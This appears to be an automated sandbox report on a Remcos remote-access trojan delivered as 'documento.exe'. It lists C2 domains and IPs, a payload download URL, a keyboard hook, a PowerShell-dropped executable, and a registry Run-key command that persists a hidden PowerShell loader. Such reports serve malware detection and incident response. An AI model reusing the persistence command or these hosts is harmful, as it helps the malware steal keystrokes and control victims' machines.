              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49198 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49200 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49201 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49203 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49208 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49209 -> 192.169.69.26:29871
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: learfo55ozj01.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: learfo55ozj02.duckdns.org
              Source: unknownDNS query: name: learfo55ozj01.duckdns.org
              Source: Joe Sandbox ViewIP Address: 104.21.60.38 104.21.60.38
              Source: Joe Sandbox ViewIP Address: 172.67.191.112 172.67.191.112
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: global trafficHTTP traffic detected: GET /ELFpBDmh152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /ELFpBDmh152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /ELFpBDmh152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: C:\Users\user\Desktop\documento.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\coversed.iniJump to behavior
              Source: global trafficHTTP traffic detected: GET /ELFpBDmh152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /ELFpBDmh152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /ELFpBDmh152.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: ricohltd.top
              Source: global trafficDNS traffic detected: DNS query: learfo55ozj01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: learfo55ozj02.duckdns.org
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 0000000F.00000002.747126778.00000000003B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoB
              Source: documento.exe, documento.exe, 00000000.00000000.336717009.0000000000409000.00000008.00000001.01000000.00000003.sdmp, documento.exe, 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: documento.exe, 00000000.00000000.336717009.0000000000409000.00000008.00000001.01000000.00000003.sdmp, documento.exe, 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: powershell.exe, 00000003.00000002.530743058.0000000002291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.568783013.0000000002931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.749519743.0000000002011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.613484329.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: powershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, 00000006.00000002.866892514.00000000003D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/
              Source: wab.exe, 00000006.00000002.866892514.0000000000407000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.871477299.0000000020BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ricohltd.top/ELFpBDmh152.bin
              Source: wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
              Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
              Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
              Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.191.112:443 -> 192.168.2.22:49204 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.22:49205 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_00405054 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405054

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3336, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: documento.exe
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\documento.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_03F2293A Sleep,NtProtectVirtualMemory,6_2_03F2293A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F1E84 NtResumeThread,15_2_083F1E84
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
              Source: C:\Users\user\Desktop\documento.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\documento.exeFile created: C:\Windows\resources\0409\Daresay112Jump to behavior
              Source: C:\Users\user\Desktop\documento.exeFile created: C:\Windows\resources\0409\Daresay112\SarcomaJump to behavior
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_004063440_2_00406344
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_004048930_2_00404893
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00267D203_2_00267D20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_002685F03_2_002685F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_002679D83_2_002679D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00217D2015_2_00217D20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_002185F015_2_002185F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_002179D815_2_002179D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F173F15_2_083F173F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F11A415_2_083F11A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F198715_2_083F1987
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F220715_2_083F2207
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F100015_2_083F1000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F207D15_2_083F207D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F176A15_2_083F176A
              Source: documento.exe, 00000000.00000002.388262010.0000000003958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs documento.exe
              Source: documento.exe, 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebystaterne fordes.exeZ vs documento.exe
              Source: documento.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/23@359/3
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_00404320 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404320
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
              Source: C:\Users\user\Desktop\documento.exeFile created: C:\Users\user\Documents\Illoyalitet.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\alpwovnb-G3F5OR
              Source: C:\Users\user\Desktop\documento.exeFile created: C:\Users\user\AppData\Local\Temp\nsuA860.tmpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................s.t.r.i.n.g.....P..................................................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.1..................................s....................".......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................(..........................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................<..........................s....................Z.......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................H..........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................Z..........................s....................Z.......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................f..........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................x..........................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .l.i.d.a.t.i.o.n.E.x.c.e.p.t.i.o.n............................s....................(.......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s....................l.......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....P..................................................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................=..........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................I..........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................[..........................s....................~.......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P.......................g..........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........y..........................s.................... .......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P..................................................s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .$.H.o.u.s.e.d...I.n.v.o.k.e.(.$.J.a.c.o.u.n.c.e.1.8.0.,. .0.)..s....................B.......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................)..s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..s....................B.......(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................~..s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................~..s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................~..s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................~..s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................~..s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....P...............................................~..s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....P...............................................~..s............................(...............Jump to behavior
              Source: C:\Windows\SysWOW64\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........(.......N.......@...............Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........S.........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........S.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................s.t.r.i.n.g.....`.......h.......D........S.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.1........T.........................s............(.......".......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......'T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......9T.........................s....................Z.......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......ET.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......WT.........................s....................Z.......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......cT.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......uT.........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .l.i.d.a.t.i.o.n.E.x.c.e.p.t.i.o.n..T.........................s............(.......(.......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s............................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s....................l.......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....`.......h.......D........T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D........T.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................C.o.p.y.-.I.t.e.m. .:. .C.a.n.n.o.t. .o.v.e.r.w.r.i.t.e. .t.h.e. .i.t.e.m. .....(.......L.......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L.......WU...................... .i.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L.......iU...................... .i.t.e.........................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L.......uU...................... .i.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.L........U...................... .i.t.e.........(....... .......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........U...................... .i.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........U...................... .i.t.e.........................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........U...................... .i.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........U...................... .i.t.e.........................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........U...................... .i.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........U...................... .i.t.e.........................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........U...................... .i.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .t.r.i.n.g.). .[.C.o.p.y.-.I.t.e.m.].,. .I.O.E.x.c.e.p.t.i.o.n.t.e.........(.......D.......................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........V......................o.n.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L........V......................o.n.t.e.........................................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......L.......)V......................o.n.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .C.o.m.m.a.n.d.....h.......L.......;V......................o.n.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......IV......................o.n.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....`.......h.......D.......\V......................o.n.t.e.........(...............................Jump to behavior
